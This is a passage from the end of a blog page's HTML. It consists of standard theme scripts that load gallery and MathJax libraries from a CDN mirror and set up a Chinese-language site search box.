    });</script><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script type="text/x-mathjax-config">MathJax.Hub.Config({
            'HTML-CSS': {
                matchFontHeight: false
            },
            SVG: {
                matchFontHeight: false
            },
            CommonHTML: {
                matchFontHeight: false
            },
            tex2jax: {
                inlineMath: [
                    ['$','$'],
                    ['\\(','\\)']
                ]
            }
        });</script><script src="https://cdnjs.loli.net/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML" defer></script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script></body></html>